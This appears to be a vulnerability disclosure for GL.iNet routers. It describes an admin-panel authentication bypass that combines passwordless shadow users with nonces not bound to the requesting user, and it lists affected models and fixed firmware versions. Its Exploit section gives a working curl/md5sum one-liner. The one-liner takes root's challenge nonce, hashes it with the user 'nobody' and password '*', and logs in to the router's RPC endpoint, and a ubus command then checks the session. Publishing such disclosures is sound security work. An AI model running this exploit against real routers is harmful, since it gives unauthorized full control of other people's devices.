# Bypassing Login Mechanism with Passwordless User Login
## Description
The vulnerability involves flawed authentication logic in the admin panel. For instance, Unix users in the shadow file who are disabled/locked or have no password set, particularly those with password fields set to an asterisk (*) or 'x', are still processed by the GL.iNet application due to poorly implemented regular expression checks. Additionally, the nonce generated for a specific user is not tied to that user, allowing other users to utilize it for authentication. The combination of these two issues enables authentication bypass.
## Affected Product
● MT6000 /MT3000 /MT2500 /AXT1800 /AX1800 /B3000 /A1300 /X300B /X3000 /XE3000 /X750 /SFT1200 /MT1300 /E750 /XE300 /AR750 /AR750S /AR300M /AR300M16 /B1300 /MT300N-V2
## Affected Firmware Version
● MT6000/MT3000/MT2500/AXT1800/AX1800: 4.6.2, fixed in 4.6.4
● B3000: 4.5.18, fixed in 4.5.19
● A1300/X300B: 4.5.17, fixed in 4.5.18
● X3000/XE3000: 4.4.9, fixed in 4.4.10
● X750/SFT1200/MT1300: 4.3.18, fixed in 4.3.19
● E750/XE300/AR750/AR750S/AR300M/AR300M16/B1300/MT300N-V2: 4.3.17, fixed in 4.3.18
## Exploit
1. Bypass the authentication of the web application (admin panel) using a one-liner shell command.
```
h=$(echo -n nobody:'*':$(curl -s -k -H 'Content-Type: application/json;charset=utf-8' -d '{"jsonrpc": "2.0", "id": 1, "method": "challenge", "params": {"username": "root"}}' 'https://192.168.8.1/rpc'|cut -d '"' -f18) |md5sum|cut -d' ' -f1) && curl -s -k -H 'Content-Type: application/json;charset=utf-8' -d '{"jsonrpc": "2.0", "id": 1, "method": "login", "params": {"username": "nobody", "hash":"'$h'"}}' 'https://192.168.8.1/rpc'
```
2. Verify on the target system if the authentication was successful.
```
ubus -v call gl-session status
```
## Impact
Once an attacker bypasses the application's authentication process, they can seek additional methods to exploit the generated valid SID. This can lead to obtaining escalated privileges and full control over the router.
京公网安备 11010502034610号
暂无评论